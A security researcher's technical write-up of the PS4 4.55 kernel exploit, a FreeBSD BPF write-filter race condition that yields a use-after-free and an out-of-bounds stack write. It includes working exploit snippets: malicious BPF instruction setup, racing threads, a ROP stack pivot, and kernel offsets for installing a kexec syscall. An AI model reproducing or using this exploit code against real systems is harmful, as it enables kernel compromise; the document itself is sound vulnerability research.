**Note: While this bug is primarily interesting for exploitation on the PS4, this bug can also potentially be exploited on other unpatched platforms using FreeBSD if the attacker has read/write permissions on /dev/bpf, or if they want to escalate from root user to kernel code execution. As such, I've published it under the "FreeBSD" folder and not the "PS4" folder.**
# Introduction
Welcome to the kernel portion of the PS4 4.55FW full exploit chain write-up. This bug was found by qwerty, and is fairly unique in the way it's exploited, so I wanted to do a detailed write-up on how it worked. The full source of the exploit can be found [here](https://github.com/Cryptogenic/PS4-4.55-Kernel-Exploit). I've previously covered the webkit exploit implementation for userland access [here](https://github.com/Cryptogenic/Exploit-Writeups/blob/master/WebKit/setAttributeNodeNS%20UAF%20Write-up.md).
# Throwback to 4.05
If you read my 4.05 kernel exploit write-up, you may have noticed that I left out how I managed to dump the kernel before obtaining code execution. I also left out the target object that was used before the `cdev` object. This target object was indeed, `bpf_d`. Because at the time this exploit involving BPF was not public and was a 0-day, I ommited it from my write-up and rewrote the exploit to use an entirely different object (this turned out to be for the better, as `cdev` turned out to be more stable anyways).
BPF was a nice target object for 4.05, as not only did it contain function pointers to jumpstart code execution, but also had a method for obtaining an arbitrary read primitive which I will detail below. While it's not entirely needed, it is helpful in the way that we don't have to write dumper code later. This section is not very relevant to the 4.55 exploit, so I will keep it brief, but feel free to skip this section if you only care about 4.55.
The `bpf_d` object has fields related to "slots" for storing data. Since this section is just a tidbit for an older exploit, I will only include the fields relevant to this section.
[src](http://fxr.watson.org/fxr/source/net/bpfdesc.h?v=FREEBSD90#L52)
```c
struct bpf_d {
// ...
caddr_t bd_hbuf; /* hold slot */ // Offset: 0x18
// ...
int bd_hlen; /* current length of hold buffer */ // Offset: 0x2C
// ...
int bd_bufsize; /* absolute length of buffers */ // Offset: 0x30
// ...
}
```
These slots are used to hold the information that gets sent back to someone who would `read()` on the bpf's file descriptor. By setting the offset at 0x18 (`bd_hbuf`) to the address of the location we want to dump, and 0x2C and 0x30 (`bd_hlen` and `bd_bufsize` respectively) to any size we choose (to dump the entire kernel, I chose 0x2800000), we can obtain an arbitrary kernel read primitive via the `read()` system call on the bpf file descriptor, and easily dump kernel memory.
# FreeBSD or Sony's fault? Why not both...
Interestingly, this bug is actually a FreeBSD bug and was not (at least directly) introduced by Sony code. While this is a FreeBSD bug however, it's not very useful for most systems because the /dev/bpf device driver is root-owned, and the permissions for it are set to 0600 (meaning owner has read/write privileges, and nobody else does) - though it can be used for escalating from root to kernel mode code execution. However, let’s take a look at the `make_dev()` call inside the PS4 kernel for /dev/bpf (taken from a 4.05 kernel dump).
```
seg000:FFFFFFFFA181F15B lea rdi, unk_FFFFFFFFA2D77640
seg000:FFFFFFFFA181F162 lea r9, aBpf ; "bpf"
seg000:FFFFFFFFA181F169 mov esi, 0
seg000:FFFFFFFFA181F16E mov edx, 0
seg000:FFFFFFFFA181F173 xor ecx, ecx
seg000:FFFFFFFFA181F175 mov r8d, 1B6h
seg000:FFFFFFFFA181F17B xor eax, eax
seg000:FFFFFFFFA181F17D mov cs:qword_FFFFFFFFA34EC770, 0
seg000:FFFFFFFFA181F188 call make_dev
```
We see UID 0 (the UID for the root user) getting moved into the register for the 3rd argument, which is the owner argument. However, the permissions bits are being set to 0x1B6, which in octal is 0666. This means *anyone* can open /dev/bpf with read/write privileges. I’m not sure why this is the case, qwerty speculates that perhaps bpf is used for LAN gaming. In any case, this was a poor design decision because bpf is usually considered privileged, and should not be accessible to a process that is completely untrusted, such as WebKit. On most platforms, permissions for /dev/bpf will be set to 0x180, or 0600.
# Race Conditions - What are they?
The class of the bug abused in this exploit is known as a "race condition". Before we get into bug specifics, it's important for the reader to understand what race conditions are and how they can be an issue (especially in something like a kernel). Often in complex software (such as a kernel), resources will be shared (or "global"). This means other threads could potentially execute code that will access some resource that could be accessed by another thread at the same point in time. What happens if one thread accesses this resource while another thread does without exclusive access? Race conditions are introduced.
Race conditions are defined as possible scenarios where events happen in a sequence different than the developer intended which leads to undefined behavior. In simple, single-threaded programs, this is not an issue because execution is linear. In more complex programs where code can be running in parallel however, this becomes a real issue. To prevent these problems, atomic instructions and locking mechanisms were introduced. When one thread wants to access a critical resource, it will attempt to acquire a "lock". If another thread is already using this resource, generally the thread attempting to acquire the lock will wait until the other thread is finished with it. Each thread must release the lock to the resource after they're done with it, failure to do so could result in a deadlock.
While locking mechanisms such as mutexes have been introduced, developers sometimes struggle to use them properly. For example, what if a piece of shared data gets validated and processed, but while the processing of the data is locked, the validation is not? There is a window between validation and locking where that data can change, and while the developer thinks the data has been validated, it could be substituted with something malicious after it is validated, but before it is used. Parallel programming can be difficult, especially when, as a developer, you also want to factor in the fact that you don't want to put too much code in between locking and unlocking as it can impact performance.
For more on race conditions, see Microsoft's page on it [here](https://support.microsoft.com/en-us/help/317723/description-of-race-conditions-and-deadlocks)
# Packet Filters - What are they?
Since the bug is directly in the filter system, it is important to know the basics of what packet filters are. Filters are essentially sets of pseudo-instructions that are parsed by `bpf_filter()`. While the pseudo-instruction set is fairly minimal, it allows you to do things like perform basic arithmetic operations and copy values around inside it's buffer. Breaking down the BPF VM in it's entirety is far beyond the scope of this write-up, just know that the code produced by it is ran in **kernel** mode - this is why read/write access to `/dev/bpf` *should* be privileged.
You can reference the opcodes that the BPF VM takes [here](http://fxr.watson.org/fxr/source/net/bpf.h?v=FREEBSD90#L995).
# Out-of-bounds Write Primitive
If we take a look at the "STOREX" mnemonic's handler in `bpf_filter()`, we see the following code:
[src](http://fxr.watson.org/fxr/source/net/bpf_filter.c?v=FREEBSD90#L376)
```c
u_int32_t mem[BPF_MEMWORDS];
// ...
case BPF_STX:
mem[pc->k] = X;
continue;
```
This is immediately interesting to us as exploit developers. If we can set `pc->k` to any arbitrary value, we can use this to establish an out-of-bounds write primitive on the stack. This can be extremely helpful, for instance, we can use this to corrupt the return pointer stored on the stack so when `bpf_filter()` returns we can start a ROP chain. This is perfect, because not only is it a trivial attack strategy to implement, but it is also stable as we don't have to worry about the issues that typically come with classic stack/heap smashing.
Unfortunately, instructions run through a validator, so trying to set `pc->k` in a way that would be outside the boundaries of `mem` will fail the validation check. But what if malicious instructions could be substituted in post-validation? There would be a "time of check, time of use" (TOCTOU) issue present.
# Race, Replace
## Setting Filters
If we take a look at `bpfioctl()`, you'll notice there are various commands for managing the interface, setting buffer properties, and of course, setting up read/write filters (a list of these commands can be found on the [FreeBSD man page](https://www.freebsd.org/cgi/man.cgi?query=bpf&sektion=4&manpath=FreeBSD+7.1-RELEASE). If we pass the "BIOSETWF" command (noted by `0x8010427B` in low-level), you'll notice that `bpf_setf()` is called to set a filter on the given device.
[src](http://fxr.watson.org/fxr/source/net/bpf.c?v=FREEBSD90#L1151)
```c
case BIOCSETF:
case BIOCSETFNR:
case BIOCSETWF:
#ifdef COMPAT_FREEBSD32
case BIOCSETF32:
case BIOCSETFNR32:
case BIOCSETWF32:
#endif
error = bpf_setf(d, (struct bpf_program *)addr, cmd);
break;
```
If you look at where the instructions are copied into kernel, you'll also see that `bpf_validate()` will run immediately, meaning at this point we cannot specify a `pc->k` value that allows out-of-bounds access.
[src](http://fxr.watson.org/fxr/source/net/bpf.c?v=FREEBSD90#L1583)
```c
// ...
size = flen * sizeof(*fp->bf_insns);
fcode = (struct bpf_insn *)malloc(size, M_BPF, M_WAITOK);
if (copyin((caddr_t)fp->bf_insns, (caddr_t)fcode, size) == 0 && bpf_validate(fcode, (int)flen)) {
// ...
}
// ...
```
## Lack of Ownership
We've taken a look at the code that sets a filter, now let's take a look at the code that uses a filter. The function `bpfwrite()` is called when a process calls the `write()` system call on a valid bpf device. We can see this via the following function table for bpf's backing `cdevsw`:
[src](http://fxr.watson.org/fxr/source/net/bpf.c?v=FREEBSD90#L183)
```c
static struct cdevsw bpf_cdevsw = {
.d_version = D_VERSION,
.d_open = bpfopen,
.d_read = bpfread,
.d_write = bpfwrite,
.d_ioctl = bpfioctl,
.d_poll = bpfpoll,
.d_name = "bpf",
.d_kqfilter = bpfkqfilter,
};
```
The purpose of `bpfwrite()` is to allow the user to write packets to the interface. Any packets passed into `bpfwrite()` will pass through the write filter that is set on the interface, which is set via the IOCTL that is detailed in the "Setting Filters" sub-section.
It first does some privilege checks (which are irrelevant because on the PS4, any untrusted process can successfully write to it due to everyone having R/W permissions on the device), and sets up some buffers before calling `bpf_movein()`.
[src](http://fxr.watson.org/fxr/source/net/bpf.c?v=FREEBSD90#L911)
```c
bzero(&dst, sizeof(dst));
m = NULL;
hlen = 0;
error = bpf_movein(uio, (int)d->bd_bif->bif_dlt, ifp, &m, &dst, &hlen, d->bd_wfilter);
if (error) {
d->bd_wdcount++;
return (error);
}
d->bd_wfcount++;
```
Let's take a look at `bpf_movein()`.
[src](http://fxr.watson.org/fxr/source/net/bpf.c?v=FREEBSD90#L504)
```c
*mp = m;
if (m->m_len < hlen) {
error = EPERM;
goto bad;
}
error = uiomove(mtod(m, u_char *), len, uio);
if (error)
goto bad;
slen = bpf_filter(wfilter, mtod(m, u_char *), len, len);
if (slen == 0) {
error = EPERM;
goto bad;
}
```
Notice, there is absolutely no locking present in `bpf_movein()`, nor in `bpfwrite()` - the caller. Therefore, `bpf_filter()`, the function that executes a given filter program on the device, is called in an unlocked state. Additionally, `bpf_filter()` itself doesn't do any locking. No ownership is maintained or even obtained in the process of executing the write filter. What would happen if this filter was free()'d after it was validated via `bpf_setf()` when setting the filter, and was reallocated with invalid instructions while the filter is executing? :)
By racing three threads (one setting a valid, non-malicious filter, one setting an invalid, malicious filter, and one trying to continously write() to bpf), there is a possible (and very exploitable) scenario where valid instructions can be replaced with invalid instructions, and we can influence `pc->k` to write out-of-bounds on the stack.
## Freeing the Filter
We need a method to be able to free() the filter in another thread while it's still running to trigger a use-after-free() situation. Looking at `bpf_setf()`, notice that before allocating a new buffer for the filter instructions, it will first check if there is an old one - if there is it will destroy it.
[src](http://fxr.watson.org/fxr/source/net/bpf.c?v=FREEBSD90#L1523)
```c
static int bpf_setf(struct bpf_d *d, struct bpf_program *fp, u_long cmd) {
struct bpf_insn *fcode, *old;
// ...
if (cmd == BIOCSETWF) {
old = d->bd_wfilter;
wfilter = 1;
// ...
} else {
wfilter = 0;
old = d->bd_rfilter;
// ...
}
// ...
if (old != NULL)
free((caddr_t)old, M_BPF);
// ...
fcode = (struct bpf_insn *)malloc(size, M_BPF, M_WAITOK);
// ...
if (wfilter)
d->bd_wfilter = fcode;
else {
d->bd_rfilter = fcode;
// ...
if (cmd == BIOCSETF)
reset_d(d);
}
}
// ...
}
```
Because `bpf_filter()` has a copy of `d->bd_wfilter`, when it is free()'d in one thread to replace the filter, the second thread will also use the same pointer (which is now free()'d) resulting in a use-after-free(). The thread attempting to set an invalid filter effectively ends up spraying the heap as a result, and will eventually get allocated into the same address. Our three threads will do the following:
1) Continously set a filter with valid instructions, passing the validation checks.
2) Continously set another filter with invalid instructions, freeing and replacing the old instructions with new ones (our malicious ones).
3) Continously write to bpf. Eventually, the "valid" filter will be corrupted with the invalid one post-validation and write() will use it resulting in memory corruption. Specially crafted instructions can be used to overwrite the return address on the stack to obtain code execution in kernel mode.
# Setting a Valid Program
Firstly, we need to setup a `bpf_program` object to pass to the ioctl() for setting a filter. The structure for `bpf_program` is below:
[src](http://fxr.watson.org/fxr/source/net/bpf.h?v=FREEBSD90#L65)
```c
struct bpf_program { // Size: 0x10
u_int bf_len; // 0x00
struct bpf_insn *bf_insns; // 0x08
};
```
It's important to note that `bf_len` is *not* the size of the program's instructions in bytes, but rather the length. This means the value we specify for `bf_len` will be the total size of our instructions in memory divided by the size of an instruction, which is eight.
[src](http://fxr.watson.org/fxr/source/net/bpf.h?v=FREEBSD90#L1050)
```c
struct bpf_insn { // Size: 0x08
u_short code; // 0x00
u_char jt; // 0x02
u_char jf; // 0x03
bpf_u_int32 k; // 0x04
};
```
A valid program is easy to write, we can simply write a bunch of NOP (no operation) psueod-instructions with a "return" pseudo-instruction at the end. By looking at `bpf.h`, we can determine that the opcodes we can use for a NOP and a RET are 0x00 and 0x06 respectively.
[src](http://fxr.watson.org/fxr/source/net/bpf.h?v=FREEBSD90#L995)
```c
#define BPF_LD 0x00 // By specifying 0's for the args it effectively does nothing
#define BPF_RET 0x06
```
Below is a code snippet from the exploit implemented in JS ROP chains to setup a valid BPF program in memory:
```javascript
// Setup valid program
var bpf_valid_prog = malloc(0x10);
var bpf_valid_instructions = malloc(0x80);
p.write8(bpf_valid_instructions.add32(0x00), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x08), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x10), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x18), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x20), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x28), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x30), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x38), 0x00000000);
p.write4(bpf_valid_instructions.add32(0x40), 0x00000006);
p.write4(bpf_valid_instructions.add32(0x44), 0x00000000);
p.write8(bpf_valid_prog.add32(0x00), 0x00000009);
p.write8(bpf_valid_prog.add32(0x08), bpf_valid_instructions);
```
# Setting an Invalid Program
This program is where we want to write our malicious code that will corrupt memory on the stack when executed via `write()`. This program is almost as simple as the valid program, as it only contains 9 psuedo-instructions. We can abuse the "LDX" and "STX" instructions to write data on the stack, by first loading the value we want to load (32-bits) into the index register, then storing index register into an index of what *should* be scratch memory, however due to the instructions being invalid, it will actually write out-of-bounds and corrupt the function's return pointer. Here is an outline of the instructions we want to run in our malicious filter:
```
LDX X <- {lower 32-bits of stack pivot gadget address (pop rsp)}
STX M[0x1E] <- X
LDX X <- {upper 32-bits of stack pivot gadget address (pop rsp)}
STX M[0x1F] <- X
LDX X <- {lower 32-bits of kernel ROP chain fake stack address}
STX M[0x20] <- X
LDX X <- {upper 32-bits of kernel ROP chain fake stack address}
STX M[0x21] <- X
RET
```
Note the type of `mem` being of type `u_int32_t`, this is the reason our writes are increasing by only 1 instead of 4. Let's take a look at `mem`'s full definition:
[src](http://fxr.watson.org/fxr/source/net/bpf_filter.c?v=FREEBSD90#L178)
```c
#define BPF_MEMWORDS 16
// ...
u_int32_t mem[BPF_MEMWORDS];
```
Notice, the buffer is only allocated for 58 bytes (16 values * 4 bytes per value) - but our instructions are accessing indexes 30, 31, 32, and 33, which are obviously way out of bounds of the buffer. Because the filter was substituted in post-validation, nothing catches this and thus an OOB write is born.
Index 0x1E and 0x1F (30 and 31) is the location on the stack of the return address. By overwriting it with the address of a `pop rsp; ret;` gadget and writing the value we want to pop into the RSP register at index 0x20 and 0x21 (32 and 33), we can successfully pivot the stack to that of our fake stack for our kernel ROP chain to obtain code execution in ring0.
![](https://i.imgur.com/RmBzWK0.gif)
Below is a code snippet from the exploit to setup an invalid, malicious BPF program in memory:
```javascript
// Setup invalid program
var entry = window.gadgets["pop rsp"];
var bpf_invalid_prog = malloc(0x10);
var bpf_invalid_instructions = malloc(0x80);
p.write4(bpf_invalid_instructions.add32(0x00), 0x00000001);
p.write4(bpf_invalid_instructions.add32(0x04), entry.low);
p.write4(bpf_invalid_instructions.add32(0x08), 0x00000003);
p.write4(bpf_invalid_instructions.add32(0x0C), 0x0000001E);
p.write4(bpf_invalid_instructions.add32(0x10), 0x00000001);
p.write4(bpf_invalid_instructions.add32(0x14), entry.hi);
p.write4(bpf_invalid_instructions.add32(0x18), 0x00000003);
p.write4(bpf_invalid_instructions.add32(0x1C), 0x0000001F);
p.write4(bpf_invalid_instructions.add32(0x20), 0x00000001);
p.write4(bpf_invalid_instructions.add32(0x24), kchainstack.low);
p.write4(bpf_invalid_instructions.add32(0x28), 0x00000003);
p.write4(bpf_invalid_instructions.add32(0x2C), 0x00000020);
p.write4(bpf_invalid_instructions.add32(0x30), 0x00000001);
p.write4(bpf_invalid_instructions.add32(0x34), kchainstack.hi);
p.write4(bpf_invalid_instructions.add32(0x38), 0x00000003);
p.write4(bpf_invalid_instructions.add32(0x3C), 0x00000021);
p.write4(bpf_invalid_instructions.add32(0x40), 0x00000006);
p.write4(bpf_invalid_instructions.add32(0x44), 0x00000001);
p.write8(bpf_invalid_prog.add32(0x00), 0x00000009);
p.write8(bpf_invalid_prog.add32(0x08), bpf_invalid_instructions);
```
# Creating and Binding Devices
To setup the corruption portion of the race, we need to open two instances of /dev/bpf. We will then bind them to a valid interface - the interface you bind to matters depending on how the system is connected to the network. If it is a wired (ethernet) connection, you'll want to bind to the "eth0" interface, if you're connected via wifi you'll want to bind to the "wlan0" interface. The exploit automatically determines which interface to use by performing a test. The test essentially attempts to `write()` to the given interface, if it is invalid, `write()` will fail and return -1. If this occurs after binding to the "eth0" interface, the exploit will attempt to rebind to "wlan0" and checks again. If `write()` again returns -1, the exploit bails and reports that it failed to bind the device.
```javascript
// Open first device and bind
var fd1 = p.syscall("sys_open", stringify("/dev/bpf"), 2, 0); // 0666 permissions, open as O_RDWR
p.syscall("sys_ioctl", fd1, 0x8020426C, stringify("eth0")); // 8020426C = BIOCSETIF
if (p.syscall("sys_write", fd1, spadp, 40).low == (-1 >>> 0)) {
p.syscall("sys_ioctl", fd1, 0x8020426C, stringify("wlan0"));
if (p.syscall("sys_write", fd1, spadp, 40).low == (-1 >>> 0)) {
throw "Failed to bind to first /dev/bpf device!";
}
}
```
The same process is then repeated for the second device.
# Setting Filters in Parallel
To cause memory corruption we need two threads running in parallel which continously set filters on their own devices. Eventually, the valid filter will be free()'d, reallocated, and corrupted with the invalid filter. To do this, each thread essentially does the following (pseudo-code):
```c
// 0x8010427B = BIOCSETWF
void threadOne() // Sets a valid program
{
for(;;)
{
ioctl(fd1, 0x8010427B, bpf_valid_program);
}
}
void threadTwo() // Sets an invalid program
{
for(;;)
{
ioctl(fd2, 0x8010427B, bpf_invalid_program);
}
}
```
# Triggering Code Execution
So we can corrupt the filters and substitute in our invalid instructions, but we need the filter to actually get ran to trigger code execution via the corrupted return address. Since we're setting a "write" filter, `bpfwrite()` is a perfect candidate to do this. This means we need a third thread to run that will constantly `write()` to the first bpf device. When the filter eventually gets corrupted, the next `write()` will run the invalid filter, causing the stack memory to be corrupted, and will jump to any address we specify allowing us to (fairly trivially) obtain code execution in ring0.
```c
void threadThree() // Tries to trigger code execution
{
void *scratch = (void *)malloc(0x200);
for(;;)
{
uint64_t n = write(fd1, scratch, 0x200);
if(n == 0x200))
{
break;
}
}
}
```
# Installing a "kexec()" syscall
Our ultimate goal with the kROP chain is to install a custom system call that will execute code in kernel mode. To keep things consistent with 4.05, we again will use syscall #11. The signature of the syscall will be as follows:
```c
sys_kexec(void *code, void *uap);
```
Doing this is fairly trivial, we just have to add an entry into the `sysent` table. An entry in the `sysent` table follows the this structure:
[src](http://fxr.watson.org/fxr/source/sys/sysent.h?v=FREEBSD90#L56)
```c
struct sysent { /* system call table */
int sy_narg; /* number of arguments */
sy_call_t *sy_call; /* implementing function */
au_event_t sy_auevent; /* audit event associated with syscall */
systrace_args_func_t sy_systrace_args_func;
/* optional argument conversion function. */
u_int32_t sy_entry; /* DTrace entry ID for systrace. */
u_int32_t sy_return; /* DTrace return ID for systrace. */
u_int32_t sy_flags; /* General flags for system calls. */
u_int32_t sy_thrcnt;
};
```
Our main points of interest are `sy_narg` and `sy_call`. We'll want to set `sy_narg` to 2 (one for the address to execute, the second for passing arguments). The `sy_call` member we'll want to set to a gadget that will `jmp` to the RSI register, since the address of the code to execute will be passed through RDI (remember, while the first argument is normally passed in the RDI register, in syscalls, RDI is occupied by the thread descriptor `td`). A `jmp qword ptr [rsi]` gadget does what we need, and can be found in the kernel at offset `0x13a39f`.
```
LOAD:FFFFFFFF8233A39F FF 26 jmp qword ptr [rsi]
```
In a 4.55 kernel dump, we can see the offset for the `sysent` entry for syscall 11 is `0xC2B8A0`. As you can see, the implementing function is `nosys`, so it's perfectly fine to overwrite.
```
_61000010:FFFFFFFF8322B8A0 dq 0 ; Syscall #11
_61000010:FFFFFFFF8322B8A8 dq offset nosys
_61000010:FFFFFFFF8322B8B0 dq 0
_61000010:FFFFFFFF8322B8B8 dq 0
_61000010:FFFFFFFF8322B8C0 dq 0
_61000010:FFFFFFFF8322B8C8 dq 400000000h
```
By writing `2` to `0xC2B8A0`, `[kernel base + 0x13a39f]` to `0xC2B8A8`, and `100000000` to `0xC2BBC8` (we want to change the flags from `SY_THR_ABSENT` to `SY_THR_STATIC`), we can successfully insert a custom system call that will execute any code given in kernel mode!
# Sony's "Patch"
The section header is a lie. Sony didn't actually patch this issue, however they did know that something wonky was going on with BPF as a crash dump accidentally made it to Sony servers from a kernel panic. Via a simple stack trace, they determined that the return address of `bpfwrite()` was corrupted. Sony couldn't seem to figure out how, so they decided to just strip `bpfwrite()` out of the kernel entirely - the #SonyWay. Luckily for them, after many hours of searching, it seems there are no other useful primitives to leverage the filter corruption, so the bug is sadly dead.
Pre-Patch BPF cdevsw:
```
bpf_devsw dd 17122009h ; d_version
; DATA XREF: sub_FFFFFFFFA181F140+1B↑o
dd 80000000h ; d_flags
dq 0FFFFFFFFA1C92250h ; d_name
dq 0FFFFFFFFA181F1B0h ; d_open
dq 0 ; d_fdopen
dq 0FFFFFFFFA16FD1C0h ; d_close
dq 0FFFFFFFFA181F290h ; d_read
dq 0FFFFFFFFA181F5D0h ; d_write
dq 0FFFFFFFFA181FA40h ; d_ioctl
dq 0FFFFFFFFA1820B30h ; d_poll
dq 0FFFFFFFFA16FF050h ; d_mmap
dq 0FFFFFFFFA16FF970h ; d_strategy
dq 0FFFFFFFFA16FF050h ; d_dump
dq 0FFFFFFFFA1820C90h ; d_kqfilter
dq 0 ; d_purge
dq 0FFFFFFFFA16FF050h ; d_mmap_single
dd -5E900FB0h, -1, 0 ; d_spare0
dd 3 dup(0) ; d_spare1
dq 0 ; d_devs
dd 0 ; d_spare2
dq 0 ; gianttrick
dq 4EDE80000000000h ; postfree_list
```
Post-Patch BPF cdevsw:
```
bpf_devsw dd 17122009h ; d_version
; DATA XREF: sub_FFFFFFFF9725DB40+1B↑o
dd 80000000h ; d_flags
dq 0FFFFFFFF979538ACh ; d_name
dq 0FFFFFFFF9725DBB0h ; d_open
dq 0 ; d_fdopen
dq 0FFFFFFFF9738D230h ; d_close
dq 0FFFFFFFF9725DC90h ; d_read
dq 0h ; d_write
dq 0FFFFFFFF9725E050h ; d_ioctl
dq 0FFFFFFFF9725F0B0h ; d_poll
dq 0FFFFFFFF9738F050h ; d_mmap
dq 0FFFFFFFF9738F920h ; d_strategy
dq 0FFFFFFFF9738F050h ; d_dump
dq 0FFFFFFFF9725F210h ; d_kqfilter
dq 0 ; d_purge
dq 0FFFFFFFF9738F050h ; d_mmap_single
dd 9738F050h, 0FFFFFFFFh, 0; d_spare0
dd 3 dup(0) ; d_spare1
dq 0 ; d_devs
dd 0 ; dev_spare2
dq 0 ; gianttrick
dq 51EDE0000000000h ; postfree_list
```
Notice the data for `d_write` is no longer a valid function pointer.
# Conclusion
This was a pretty cool bug to exploit and write-up. While the bug is not incredibly helpful on most other systems as it cannot be exploited from an unprivileged user, it is still valid as a method of going from root to ring0 code execution. I thought this would be a cool bug to write-up (plus I love writing them anyway) as the attack strategy is fairly unique (using a race condition to trigger an out-of-bounds write on the stack). It's also a fairly trivial exploit to implement, and the strategy of overwriting the return pointer on the stack is an easy method for learning security researchers to understand. It also highlights how while an attack strategy may be old, perhaps this one being the oldest there is - they can still be applied in modern exploitation with slight variations.
# Credits
[qwertyoruiopz](https://twitter.com/qwertyoruiopz)
# References
[Watson FreeBSD Kernel Cross Reference](http://fxr.watson.org/fxr/source/?v=FREEBSD90)
[Microsoft Support : Description of race conditions and deadlocks](https://support.microsoft.com/en-us/help/317723/description-of-race-conditions-and-deadlocks)